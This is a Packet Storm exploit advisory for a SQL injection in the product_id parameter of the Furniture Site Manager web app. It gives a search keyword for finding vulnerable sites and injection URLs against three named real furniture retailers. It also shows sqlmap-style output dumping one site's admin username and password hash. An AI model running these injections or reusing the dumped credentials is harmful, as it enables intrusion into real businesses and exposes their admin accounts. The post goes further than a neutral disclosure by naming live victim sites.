Furniture Site Manager suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
eed7a3816e2b07e5e69779e732c4e7fb71add6fcbc27a1090a52dcf96ec86c59Furniture Site Manager => Remote (product_id) SQL Injection Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr (onlymail)
[~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org
[~] GREETZ : DaiMon,BARCOD3_UnDeRTaKeR_
[Say]: Görmeyeli nasýlsýnýz beyler? xoron hala buralarý takip ettiðine eminim. arada bir selam ver geç buralara özletme :)
{çýtýrdan geri döndük biline...}
{THE H4X0RE SECURITY PROJECT continues!! ] (Turkey]
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Furniture Site Manager
|~Price : N/A
|~Software: https://www.balcom-vetillo.com/furniture-site-manager/ - https://www.furnituresitemanager.com/
|~Vulnerability Style : SQL Injection
|~Vulnerability Dir : /
|~Keyword : "Powered By Furniture Site Manager"
|[~]Date : "27.AG.2014"
|[~]Tested on : (L):Kali Linux, Windows XP (R):Apache, PHP 5.4.31, MySQL 5
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos:
http://finestfurniture.com/index.php?route=product/product&path=69&product_id=29880' AAAAAAAAAAAAAAA
http://lakeknoxvillefurnitureco.com/index.php?route=product/product&product_id=36398' AAAAAAAAAAAAAAAA
http://curlysfurniture.com/index.php?route=product/product&path=68&product_id=7171' AAAAAAAAAAAAAAAA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Explotation| SQL Injection~~~~~~~~~~~}|
http://$Site/$path/index.php?route=product/product&path=[true ID]&product_id=[true ID]' {SQL Injection}
http://$Site/$path/index.php?route=product/product&product_id=[true ID]' {SQL INJECTÝON}
Ex; http://curlysfurniture.com
[~] SQL Injecting..
http://curlysfurniture.com/index.php?route=product/product&path=68&product_id=7171' //SQL Command
the console
...
[20:56:26] [INFO] fetching columns 'user_id=1, password, username' for table 'oc_user' in database 'curlysfurniture'
[20:56:26] [INFO] the SQL query used returns 2 entries
[20:56:26] [INFO] resumed: username
[20:56:26] [INFO] resumed: varchar(20)
[20:56:26] [INFO] resumed: password
[20:56:26] [INFO] resumed: varchar(40)
[20:56:26] [INFO] fetching entries of column(s) 'password, username' for table 'oc_user' in database 'curlysfurniture'
[20:56:26] [INFO] the SQL query used returns 1 entries
[20:56:26] [INFO] resumed: 749ec92d59aada28cd05de30b8e23aef92b8221c
[20:56:26] [INFO] resumed: admin
...
...
...
=============================================================
goodluck. greetz TURKEY
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed